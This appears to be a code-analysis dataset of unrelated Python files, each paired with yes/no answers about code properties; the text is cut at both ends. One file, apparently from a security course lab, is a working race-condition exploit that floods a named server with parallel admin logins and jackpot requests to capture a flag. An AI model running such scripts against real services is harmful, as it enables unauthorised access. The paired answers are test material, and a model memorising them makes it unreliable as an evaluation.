        print("Invalid environment variables provided for video processor")
        print("Variable %s must be %s or %s, exits" %
              (constants.METADATA_FRAME_TAKE_TYPE_ENV_VAR_NAME, constants.METADATA_FRAME_TAKE_TYPE_RESPONSE,
               constants.METADATA_FRAME_TAKE_TYPE_SUBSCRIBE))
    return taker
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer"... | 3 | video_processor/frame_comm.py | zhiyanliu/riverrun |
import pytest
import subprocess
from Browser.assertion_engine import AssertionOperator
@pytest.fixture()
def application_server():
    # Start the demo node server for the duration of a test, then kill it.
    process = subprocess.Popen(
        ["node", "./node/dynamic-test-app/dist/server.js", "7272"]
    )
    yield
    process.terminate()
@pytest.fixture()
def browser(monkeypatch):
    # Fresh Browser library instance per test; all browsers closed afterwards.
    import Browser
    browser = Browser.Browser()
    yield browser
    browser.close_browser("ALL")
def test_open_page_get_text(application_server, browser):
    browser.new_page("localhost:7272/dist/")
    # get_text with an assertion operator both asserts and returns the text.
    text = browser.get_text("h1", AssertionOperator["=="], "Login Page")
    assert text == "Login Page"
def test_readme_example(browser):
    # NOTE(review): depends on live network access to playwright.dev.
    browser.new_page("https://playwright.dev")
    assert browser.get_text("h1") == "🎭 Playwright"
def test_new_browser_and_close(browser):
    browser.new_browser()
    browser.close_browser()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding se... | 3 | utest/test_python_usage.py | emanlove/robotframework-browser |
import pytest
from gene_finder.utils import get_neighborhood_ranges
def _build_hit_dictionary(coords):
hits = {}
for coord in coords:
key = "hit_{}_{}".format(coord[0], coord[1])
hits[key] = {}
hits[key]["Query_start-pos"] = coord[0]
hits[key]["Query_end-pos"] = coord[1]
return hits
@pytest.mark.parametrize('hit_coords,expected_num_neighborhoods,expected_ranges', [
    ([(1,500), (3500, 3600), (6000, 6500)], 3, [(0, 1500), (2500, 4600), (5000, 7500)]),
    ([(1,500), (600, 11400), (20000, 20250)], 2, [(0, 12400), (19000, 21250)]),
    ([(1,500), (500, 1000), (1000, 1500)], 1, [(0, 2500)]),
    ([(500, 1), (600, 11400), (20000, 20250)], 2, [(0, 12400), (19000, 21250)]),
    ([(1,500), (500,1), (400, 600)], 1, [(0, 1600)]),
    ([(1, 500), (400, 2)], 1, [(0, 1500)]),
    ([(1, 500), (400, 1100), (1101, 1200)], 1, [(0, 2200)]),
    ([(2500, 2000)], 1, [(1000, 3500)])
])
def test_get_neighborhood_ranges(hit_coords, expected_num_neighborhoods, expected_ranges):
    # Overlapping/nearby hits (within `span`) should merge into one region;
    # reversed coordinates (start > end) must be handled the same way.
    hits = _build_hit_dictionary(hit_coords)
    neighborhoods = get_neighborhood_ranges(hits, 100000, span=1000)
    assert len(neighborhoods) == expected_num_neighborhoods
    for nbh, expected_range in zip(neighborhoods, expected_ranges):
        assert nbh == expected_range
@pytest.mark.parametrize('bait_ORF_coords,expected_last_range', [
    ([(6000, 6500)], (5000, 7500)),
    ([(1,500)], (0, 1500)),
    ([(98000, 99000)], (97000, 100000)),
    ([(98000, 99800)], (97000, 100000))
])
def test_get_neighborhood_ranges_bounds(bait_ORF_coords, expected_last_range):
    """
    Test that `get_neighborhood_ranges` always reports candidate region coordinates
    that are actually within the bounds of the parent contig.
    """
    hits = _build_hit_dictionary(bait_ORF_coords)
    neighborhoods = get_neighborhood_ranges(hits, contig_len=100000, span=1000)
    assert neighborhoods[0] == expected_last_range
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer":... | 3 | tests/test_gene_finder/test_utils.py | caacree/Opfi |
'''
Created on Oct 29, 2018
@author: riaps
'''
class Origin(object):
    """RIAPS app origin -- the app's 'signature'.

    Attributes:
        url:  URL of the repo (or local folder) the app is coming from.
        host: host IP address.
        mac:  MAC address of the host.
        sha:  SHA digest of the package.
        home: local source folder (used in remote debugging).
    """
    def __init__(self, url, host, mac, sha, home):
        self.url = url
        self.host = host
        self.mac = mac
        self.sha = sha
        self.home = home
    def __repr__(self):
        # Mirrors the constructor signature for eval-style debugging output.
        return "%s(url=%r, host=%r, mac=%r, sha=%r, home=%r)" % (
            type(self).__name__, self.url, self.host, self.mac, self.sha, self.home)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | src/riaps/utils/origin.py | mbellabah/riaps-pycom |
class Soma:
    """Accumulates single-character card counts and sums them as integers."""
    def __init__(self):
        # Flat list of single-character strings, one entry per card.
        self.numeroDeCartas = []
    def set_numeroDeCartas(self, numero):
        """Append each character of *numero*; '' counts as one card ('1')."""
        if numero == '':
            numero = '1'
        # extend() iterates the string, storing one entry per character.
        self.numeroDeCartas.extend(numero)
    def get_numeroDeCartas(self):
        return self.numeroDeCartas
    def ConverterPInt(self, converter):
        """Convert a sequence of digit characters into a list of ints."""
        return [int(item) for item in converter]
    def Somar(self):
        """Sum all stored digits."""
        return sum(self.ConverterPInt(self.get_numeroDeCartas()))
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",... | 3 | 14-flashcardsContador/1-versaoTerminal/0-versoesAntigas/flashcardsContador2/Soma.py | jonasht/Python |
from typing import Any, Dict
import httpx
from ...client import Client
from ...models.a_form_data import AFormData
from ...types import Response
def _get_kwargs(
    *,
    client: Client,
    form_data: AFormData,
) -> Dict[str, Any]:
    # Assemble httpx request kwargs: URL, auth headers/cookies and form body.
    url = "{}/tests/post_form_data".format(client.base_url)
    headers: Dict[str, Any] = client.get_headers()
    cookies: Dict[str, Any] = client.get_cookies()
    return {
        "url": url,
        "headers": headers,
        "cookies": cookies,
        "timeout": client.get_timeout(),
        "data": form_data.to_dict(),
    }
def _build_response(*, response: httpx.Response) -> Response[Any]:
    # Wrap the raw httpx response; this endpoint has no parsed body type.
    return Response(
        status_code=response.status_code,
        content=response.content,
        headers=response.headers,
        parsed=None,
    )
def sync_detailed(
    *,
    client: Client,
    form_data: AFormData,
) -> Response[Any]:
    """Post from data
    Post form data
    Returns:
        Response[Any]
    """
    kwargs = _get_kwargs(
        client=client,
        form_data=form_data,
    )
    response = httpx.post(
        verify=client.verify_ssl,
        **kwargs,
    )
    return _build_response(response=response)
async def asyncio_detailed(
    *,
    client: Client,
    form_data: AFormData,
) -> Response[Any]:
    """Post from data
    Post form data
    Returns:
        Response[Any]
    """
    kwargs = _get_kwargs(
        client=client,
        form_data=form_data,
    )
    # Async variant: one short-lived AsyncClient per call.
    async with httpx.AsyncClient(verify=client.verify_ssl) as _client:
        response = await _client.post(**kwargs)
    return _build_response(response=response)
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"an... | 3 | end_to_end_tests/golden-record/my_test_api_client/api/tests/post_form_data.py | kmray/openapi-python-client |
from PIL import Image
import numbers
class RandomCrop(object):
    """Crop a PIL image to `size` at an offset scaled by `v` in [0, 1].

    `v` is a pre-drawn random value shared by the caller so every image in
    the same group is cropped identically (deterministic per group).
    """
    def __init__(self, size, v):
        # size: a single number (square crop) or a (height, width) pair.
        if isinstance(size, numbers.Number):
            self.size = (int(size), int(size))
        else:
            self.size = size
        self.v = v
    def __call__(self, img):
        w, h = img.size
        th, tw = self.size
        # Offset = slack (w - tw, h - th) scaled by the shared value v.
        x1 = int(( w - tw)*self.v)
        y1 = int(( h - th)*self.v)
        #print("print x, y:", x1, y1)
        assert(img.size[0] == w and img.size[1] == h)
        if w == tw and h == th:
            out_image = img
        else:
            out_image = img.crop((x1, y1, x1 + tw, y1 + th)) #same cropping method for all images in the same group
        return out_image
class RandomHorizontalFlip(object):
    """Randomly horizontally flips the given PIL.Image with a probability of 0.5
    """
    def __init__(self, v):
        # v: pre-drawn random value in [0, 1); flip happens when v < 0.5 so
        # all images in a group share the same flip decision.
        self.v = v
        return
    def __call__(self, img):
        if self.v < 0.5:
            img = img.transpose(Image.FLIP_LEFT_RIGHT)
            #print ("horiontal flip: ",self.v)
        return img
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},... | 3 | api/utils/data_utils.py | wtomin/Multitask-Emotion-Recognition-with-Incomplete-Labels |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import contextlib
import os
@contextlib.contextmanager
def cwd(dirname):
    """Temporarily chdir into *dirname*, yielding the previous directory."""
    previous = os.getcwd()
    os.chdir(dirname)
    try:
        yield previous
    finally:
        # Always restore, even if the body raised.
        os.chdir(previous)
def iter_all_files(root, prune_dir=None, exclude_file=None):
    """Yield (dirname, basename, filename) for each file in the tree.

    A flattened, filterable alternative to os.walk().
    """
    queue = [root]
    while queue:
        current = queue.pop(0)
        for triple in _iter_files(current, queue, prune_dir, exclude_file):
            yield triple


def iter_tree(root, prune_dir=None, exclude_file=None):
    """Yield (dirname, files) for each directory in the tree.

    Each entry in files is a (basename, filename) pair. A filterable
    alternative to os.walk().
    """
    queue = [root]
    while queue:
        current = queue.pop(0)
        entries = [(base, full) for _, base, full
                   in _iter_files(current, queue, prune_dir, exclude_file)]
        yield current, entries


def _iter_files(dirname, subdirs, prune_dir, exclude_file):
    # Shared scanner: files are yielded; subdirectories are appended to
    # *subdirs* unless pruned by the prune_dir callback.
    for basename in os.listdir(dirname):
        filename = os.path.join(dirname, basename)
        if os.path.isdir(filename):
            if prune_dir is None or not prune_dir(dirname, basename):
                subdirs.append(filename)
            continue
        # TODO: Use os.path.isfile() to narrow it down?
        if exclude_file is None or not exclude_file(dirname, basename):
            yield dirname, basename, filename
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (ex... | 3 | home/vscode/extensions/ms-python.python-2021.12.1559732655/pythonFiles/lib/python/debugpy/_vendored/_util.py | qwertzy-antonio-godinho/dots |
from abc import ABC, abstractmethod
from typing import List
import numpy as np
class Ledger(ABC):
    """Abstract interface for a transaction ledger with sequential ids."""
    @abstractmethod
    def get_next_batch_id(self) -> int:
        """Return next available batch id."""
    @abstractmethod
    def get_next_transaction_id(self) -> int:
        """Return next available transaction id."""
class PandasLedger(Ledger):
    """Ledger backed by a pandas DataFrame.

    Subclasses are expected to provide `self.df` (the ledger frame) and
    `self.columns` (the column subset to keep) — TODO confirm against
    concrete subclasses; they are not defined here.
    """
    def get_next_batch_id(self) -> int:
        # max() on an empty/all-NaN column raises ValueError -> first id is 0.
        try:
            next_id = int(self.df["batch_id"].max()) + 1
        except ValueError:
            return 0
        return next_id
    def append(self, df) -> List[int]:
        """Assign sequential transaction ids to *df* and append its rows.

        Returns the list of assigned transaction ids. Note: mutates the
        passed-in frame (adds a `transaction_id` column).
        """
        next_id = self.get_next_transaction_id()
        ids = np.arange(start=next_id, stop=next_id + df.shape[0])
        df["transaction_id"] = ids
        # NOTE(review): DataFrame.append was removed in pandas 2.0; this
        # requires pandas < 2 or migration to pd.concat.
        self.df = self.df.append(df[self.columns], ignore_index=True, sort=False)
        return list(ids)
    def get_next_transaction_id(self) -> int:
        # Same empty-ledger convention as get_next_batch_id.
        try:
            next_id = int(self.df["transaction_id"].max()) + 1
        except ValueError:
            return 0
        return next_id
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer"... | 3 | ledger.py | HaeckelK/bookkeeping |
from functools import wraps
from sqlite3 import connect
cxn = connect("./files/database.db", check_same_thread=False)
cur = cxn.cursor()
def with_commit(func):
    """Decorator: run *func*, then commit the shared connection.

    Note: *func*'s return value is intentionally discarded, matching the
    original behavior (wrapped functions are used for their side effects).
    """
    # Idiom fix: functools.wraps preserves the wrapped function's metadata
    # (__name__, __doc__), which the original decorator lost.
    @wraps(func)
    def inner(*args, **kwargs):
        func(*args, **kwargs)
        commit()
    return inner
@with_commit
def build():
    """Create the schema from script.sql (commit handled by the decorator)."""
    scriptexec("./files/script.sql")
def commit():
    """Commit the shared module-level connection."""
    cxn.commit()
def close():
    """Close the shared module-level connection."""
    cxn.close()
def field(command, *values):
    """Run *command* and return the first column of the first row, or None."""
    cur.execute(command, tuple(values))
    row = cur.fetchone()
    if row is not None:
        return row[0]
def record(command, *values):
    """Run *command* and return the first row (or None)."""
    cur.execute(command, tuple(values))
    return cur.fetchone()
def records(command, *values):
    """Run *command* and return all rows."""
    cur.execute(command, tuple(values))
    return cur.fetchall()
def column(command, *values):
    """Run *command* and return the first column of every row as a list."""
    cur.execute(command, tuple(values))
    return [item[0] for item in cur.fetchall()]
def execute(command, *values):
    """Run *command* with the given parameters; no result returned."""
    cur.execute(command, tuple(values))
def mutliexec(command, valueset):
    # NOTE(review): name is a typo of "multiexec", kept for API compatibility.
    """Run *command* once per parameter tuple in *valueset*."""
    cur.executemany(command, valueset)
def scriptexec(filename):
    """Execute the SQL script stored in *filename*."""
    with open(filename, "r") as script:
        cur.executescript(script.read())
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"... | 3 | lib/db.py | sbshrey/twitch-bot-tutorial |
import os
import unittest
from typing import Dict
from kfai_env import Environment
from kfai_sql_chemistry.db.database_config import DatabaseConfig
from kfai_sql_chemistry.db.engines import SQLEngineFactory
def setUpModule():
    # Force the TEST environment for every test in this module.
    os.environ['ENV'] = 'TEST'
def tearDownModule():
    # Reset the flag so subsequent test modules are unaffected.
    os.environ['ENV'] = ''
class CreateDbConnectionTest(unittest.TestCase):
    """Exercises engine registration and a basic connection round-trip."""
    def setUp(self):
        # Load the TEST environment definitions shipped with the package.
        e = Environment('./kfai_sql_chemistry/test/env')
        e.register_environment("TEST")
        e.load_env()
    @unittest.skip("Skip until we run databases in github actions")
    def test_registration_and_access(self):
        """Build engines from local env config and run a trivial query."""
        database_map: Dict[str, DatabaseConfig] = {
            "main": DatabaseConfig.from_local_env("main")
        }
        factory = SQLEngineFactory()
        factory.create_all_engines(database_map)
        engine = factory.get_engine("main")
        with engine.connect() as conn:
            print(conn.execute("SELECT 1").fetchall())
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | kfai_sql_chemistry/test/test_create_db_connection.py | krishisharma45/sql-chemistry |
import requests
def get_patient_data(patient_id):
    """Fetch version 1 of a Patient resource from the public HAPI FHIR server.

    Returns the decoded JSON body.
    """
    res = requests.get(f'http://hapi.fhir.org/baseDstu3/Patient/{patient_id}/_history/1?_pretty=true&_format=json')
    return res.json()
def get_data(id,
             fhir_base='http://hapi.fhir.org/baseDstu3/',
             fhir_resource='Patient/'):
    """Fetch an arbitrary FHIR resource by id.

    Returns a (status_code, json_body) tuple.  NOTE(review): ``id`` shadows
    the builtin of the same name; left unchanged to preserve the keyword API.
    """
    res = requests.get(f'{fhir_base}{fhir_resource}{id}')
    return res.status_code, res.json()
if __name__ == "__main__":
    # Demo: fetch one patient and show the (status, body) tuple pieces.
    data = get_data(1627582)
    print(type(data), len(data))
    print(data[0], '\n')
    print(data[1])
    # print(type(data[0]), data[0])
    # print(type(data[1]), data[1])
    # status, data = get_data(1627582)
    # print(status)
    # print(data)
    # print('Patient Data', patient_data, '\n')
    # patient_data = get_data(1627582)
    # print('Patient Data', patient_data, '\n')
    # observation_data = get_data(445905, fhir_resource='Observation/')
    # print('Observation Data', observation_data, '\n')
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | _site/lectures/Week 01 - Language basics, Generating Data, Storing Data/inclass-2019-05-23.py | BrianKolowitz/data-focused-python |
"""
Tools for interop with other libraries.
Check if libraries available without importing them which can be slow.
"""
import importlib.util
from typing import Any, Callable
# pylint: disable=import-outside-toplevel
class _LibChecker:
@property
def rasterio(self) -> bool:
return self._check("rasterio")
@property
def xarray(self) -> bool:
return self._check("xarray")
@property
def geopandas(self) -> bool:
return self._check("geopandas")
@property
def dask(self) -> bool:
return self._check("dask")
@property
def folium(self) -> bool:
return self._check("folium")
@property
def ipyleaflet(self) -> bool:
return self._check("ipyleaflet")
@staticmethod
def _check(lib_name):
return importlib.util.find_spec(lib_name) is not None
have = _LibChecker()
__all__ = ("have",)
def __dir__():
    # Advertise the lazily-provided attribute alongside the public names.
    return [*__all__, "is_dask_collection"]
def __getattr__(name):
    """Module-level lazy attribute hook (PEP 562).

    Resolves ``is_dask_collection`` to dask's real helper when dask is
    installed, otherwise to a stub that always returns False.
    """
    if name == "is_dask_collection":
        if have.dask:
            import dask
            return dask.is_dask_collection
        # pylint: disable=redefined-outer-name
        def is_dask_collection(_: Any) -> bool:
            return False
        return is_dask_collection
    raise AttributeError(f"module {__name__} has no attribute {name}")
is_dask_collection: Callable[[Any], bool]
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | odc/geo/_interop.py | opendatacube/odc-geo |
from django.shortcuts import render, get_object_or_404
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Post
from .serializers import PostSerializer
class BlogListView(APIView):
    """Return the four most recent posts from the published-posts manager."""

    def get(self, request, *args, **kwargs):
        latest_posts = Post.postobjects.all()[0:4]
        payload = PostSerializer(latest_posts, many=True).data
        return Response(payload)
class PostDetailView(APIView):
    """Return a single post looked up by slug; 404 when it does not exist."""

    def get(self, request, post_slug, *args, **kwargs):
        matched = get_object_or_404(Post, slug=post_slug)
        return Response(PostSerializer(matched).data)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?... | 3 | backend/blog/views.py | alexandersilvera/django-rest-blog |
# qubit number=4
# total number=44
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
# Module-level QVM connection (unused below; get_qc is used instead).
conn = QVMConnection()
def make_circuit()-> Program:
    """Return the fixed 4-qubit benchmark program.

    The gate sequence is machine-generated; the "number=" comments are the
    generator's gate indices and are kept for traceability.
    """
    prog = Program() # circuit begin
    prog += CNOT(0,3) # number=13
    prog += CNOT(0,3) # number=17
    prog += X(3) # number=18
    prog += RX(-3.1101767270538954,1) # number=27
    prog += CNOT(0,3) # number=19
    prog += CNOT(0,3) # number=15
    prog += H(1) # number=2
    prog += H(2) # number=3
    prog += H(3) # number=4
    prog += Y(3) # number=12
    prog += H(1) # number=26
    prog += H(0) # number=5
    prog += H(1) # number=6
    prog += X(3) # number=29
    prog += H(2) # number=7
    prog += CNOT(3,0) # number=20
    prog += H(0) # number=32
    prog += CZ(3,0) # number=33
    prog += H(0) # number=34
    prog += CNOT(3,0) # number=41
    prog += Z(3) # number=42
    prog += CNOT(3,0) # number=43
    prog += H(0) # number=38
    prog += CZ(3,0) # number=39
    prog += H(0) # number=40
    prog += CNOT(3,0) # number=22
    prog += H(3) # number=8
    prog += CNOT(3,0) # number=35
    prog += Z(3) # number=36
    prog += CNOT(3,0) # number=37
    prog += H(0) # number=9
    prog += Y(2) # number=10
    prog += Y(2) # number=11
    prog += X(1) # number=30
    prog += X(1) # number=31
    # circuit end
    return prog
def summrise_results(bitstrings) -> dict:
    """Count how often each bitstring occurs; returns {bitstring: count}.

    (Name kept as-is -- typo of "summarise" -- since callers use it.)
    """
    counts = {}
    for bits in bitstrings:
        counts[bits] = counts.get(bits, 0) + 1
    return counts
if __name__ == '__main__':
    # Build the circuit, run 1024 shots on a 4-qubit QVM, then histogram
    # the measured bitstrings into a CSV report file.
    prog = make_circuit()
    qvm = get_qc('4q-qvm')
    results = qvm.run_and_measure(prog,1024)
    # Stack per-qubit measurement arrays into rows of per-shot bitstrings.
    bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
    bitstrings = [''.join(map(str, l)) for l in bitstrings]
    writefile = open("../data/startPyquil3332.csv","w")
    print(summrise_results(bitstrings),file=writefile)
    writefile.close()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "any_function_over_40_lines",
"question": "Is any function in this file longer than 40 lines?",
"answer": true
... | 3 | benchmark/startPyquil3332.py | UCLA-SEAL/QDiff |
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from ..utils import Calc
def test_Calc_inputs():
    """Verify every declared metadata value on Calc's input traits."""
    input_map = dict(
        args=dict(argstr='%s', ),
        environ=dict(
            nohash=True,
            usedefault=True,
        ),
        expr=dict(
            argstr='-expr "%s"',
            mandatory=True,
            position=3,
        ),
        in_file_a=dict(
            argstr='-a %s',
            extensions=None,
            mandatory=True,
            position=0,
        ),
        in_file_b=dict(
            argstr='-b %s',
            extensions=None,
            position=1,
        ),
        in_file_c=dict(
            argstr='-c %s',
            extensions=None,
            position=2,
        ),
        num_threads=dict(
            nohash=True,
            usedefault=True,
        ),
        other=dict(
            argstr='',
            extensions=None,
        ),
        out_file=dict(
            argstr='-prefix %s',
            extensions=None,
            name_source='in_file_a',
            name_template='%s_calc',
        ),
        outputtype=dict(),
        overwrite=dict(argstr='-overwrite', ),
        single_idx=dict(),
        start_idx=dict(requires=['stop_idx'], ),
        stop_idx=dict(requires=['start_idx'], ),
    )
    inputs = Calc.input_spec()
    # Each expected metadata key/value must match the trait definition.
    for key, metadata in list(input_map.items()):
        for metakey, value in list(metadata.items()):
            assert getattr(inputs.traits()[key], metakey) == value
def test_Calc_outputs():
    """Verify the declared metadata on Calc's output traits."""
    output_map = dict(out_file=dict(extensions=None, ), )
    outputs = Calc.output_spec()
    for key, metadata in list(output_map.items()):
        for metakey, value in list(metadata.items()):
            assert getattr(outputs.traits()[key], metakey) == value
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "any_function_over_40_lines",
"question": "Is any function in this file longer than 40 lines?",
"answer": true
... | 3 | nipype/interfaces/afni/tests/test_auto_Calc.py | PAmcconnell/nipype |
from alembic import context
from prettyconf import config
from sqlalchemy import create_engine
from thales import db
DATABASE_URL = config('DATABASE_URL')
METADATA = db.metadata
def run_migrations_offline():
    """Run migrations in 'offline' mode: emit SQL without a DB connection."""
    # FIX: alembic's configure() takes ``target_metadata``; the original
    # passed ``metadata=``, which alembic stores as an unused custom opt,
    # so autogenerate would see no metadata in offline mode.
    context.configure(url=DATABASE_URL, target_metadata=METADATA)
    with context.begin_transaction():
        context.run_migrations()
def run_migrations_online():
    """Run migrations in 'online' mode against a live engine."""
    engine = create_engine(DATABASE_URL)
    with engine.connect() as connection:
        context.configure(connection=connection, target_metadata=METADATA)
        with context.begin_transaction():
            context.run_migrations()
if context.is_offline_mode():
    run_migrations_offline()
else:
    run_migrations_online()
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | thales/migrations/env.py | cacarrara/thales |
# module for distance computation;
import numpy as np
def dist(arraya, arrayb, mode):
    """Distance between two vectors.

    mode 0 -> Manhattan (L1); mode 1 -> Euclidean (L2);
    any other mode -> cosine distance (1 - cosine similarity).
    """
    if mode == 0:
        return np.sum(np.abs(np.subtract(arraya, arrayb)))
    if mode == 1:
        return np.sqrt(np.sum(np.power(np.subtract(arraya, arrayb), 2)))
    norm_prod = np.sqrt(np.sum(np.power(arraya, 2)) * np.sum(np.power(arrayb, 2)))
    return 1 - np.dot(arraya, arrayb) / norm_prod
def corr(arraya, arrayb, show):
    """Pearson correlation coefficient of two equal-length vectors.

    ``show`` is accepted for API compatibility but is not used.
    """
    dev_a = np.subtract(arraya, np.mean(arraya))
    dev_b = np.subtract(arrayb, np.mean(arrayb))
    denom = np.sqrt(np.multiply(np.sum(np.power(dev_a, 2)), np.sum(np.power(dev_b, 2))))
    return np.sum(np.multiply(dev_a, dev_b)) / denom
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | DCS311 Artificial Intelligence/KNN/lab1_code/M3/dist.py | Lan-Jing/Courses |
from requests import session
from threading import Thread
from re import findall
SERVER = "http://mustard.stt.rnl.tecnico.ulisboa.pt:12202"
# Shared session and flag-capture slot used by both worker threads.
s = session()
f = None
def doLogin():
    """Authenticate the shared session with the default admin credentials."""
    data = {
        "username": "admin",
        "password": "admin"
    }
    s.post(SERVER + "/login", data=data)
def doJackpot():
    """Hit /jackpot and capture any SSof{...} flag into the global ``f``."""
    global f
    r = s.get(SERVER + "/jackpot")
    f = findall(r"SSof{.*}", r.text)
# Race-condition exploit: fire login and jackpot concurrently and retry
# until the jackpot request lands while the session counts as logged in.
while True:
    thrs = [
        Thread(target=doLogin),
        Thread(target=doJackpot)
    ]
    for thr in thrs: thr.start()
    for thr in thrs: thr.join()
    if f:
        print(f[0])
        s.close()
        break
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | Labs/6/RaceConditions/RemoteRace/Exploit.py | Opty-MISCE/SS |
import os
import sys
import grammaire
from datalabs.operations.edit.editing import editing
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), "../../../../"))
)
def readfile(file):
    """Return the file's lines (trailing newlines kept), decoded as UTF-8."""
    with open(file, encoding="utf8") as handle:
        return handle.readlines()
def load_rules(file):
    """Return the whole rules file as one UTF-8 string."""
    with open(file, encoding="utf8") as handle:
        return handle.read()
@editing(
    name="insert_abbreviation",
    contributor="xl_augmenter",
    task="Any",
    description="This perturbation replaces in texts some well"
    " known words or expressions with (one of) their abbreviations.",
)
def insert_abbreviation(
    text: str,
    max_outputs=1,
    seed=0,
):
    """Replace known expressions in ``text`` with their abbreviations.

    Rules come from resources/replacement_rules_en.txt and are applied via
    the ``grammaire`` parser.  ``max_outputs`` and ``seed`` are part of the
    augmenter API but are unused here.  Returns a one-key dict keyed
    "text_insert_abbreviation".
    """
    current_path = os.path.realpath(__file__).replace(
        os.path.basename(__file__), "../../../resources/"
    )
    rulefile_en = f"{current_path}replacement_rules_en.txt"
    rules_en = load_rules(rulefile_en)
    # First we compile our rules...
    grammar_en = grammaire.compile(rules_en)
    results = grammaire.parse(text, grammar_en)
    # We now replace the strings with their label
    perturbed_texts = text
    # Each list in results is an element such as: [label, [left,right]]
    # label pertains from rules
    # left is the left offset of the isolated sequence of words
    # right is the right offset of the isolated sequence of words
    # elements are stored from last to first in the text along the offsets
    # (so splicing by offset stays valid as earlier text is rewritten)
    for v in results:
        from_token = v[1][0]
        to_token = v[1][1]
        perturbed_texts = (
            perturbed_texts[:from_token] + v[0] + perturbed_texts[to_token:]
        )
    # return [perturbed_texts]
    return {"text_insert_abbreviation": perturbed_texts}
# sentence = "Make sure you've gone online to download one of
# the vouchers - it's definitely not worth paying full price for!"
# perturbed = insert_abbreviation(text=sentence)
# print(perturbed)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docst... | 3 | datalabs/operations/edit/plugins/general/insert_abbreviation/transformation.py | ExpressAI/DataLab |
from __future__ import unicode_literals
import json
from urllib.parse import quote
import pytest
import sure # noqa
import moto.server as server
from moto import mock_iot
"""
Test the different server responses
"""
@mock_iot
def test_iot_list():
    """Smoke-test that the mocked IoT server answers /things."""
    backend = server.create_backend_app("iot")
    test_client = backend.test_client()
    # just making sure that server is up
    res = test_client.get("/things")
    res.status_code.should.equal(200)
@pytest.mark.parametrize(
    "url_encode_arn",
    [
        pytest.param(True, id="Target Arn in Path is URL encoded"),
        pytest.param(False, id="Target Arn in Path is *not* URL encoded"),
    ],
)
@mock_iot
def test_list_attached_policies(url_encode_arn):
    """Attach a policy to a fresh certificate and list it back.

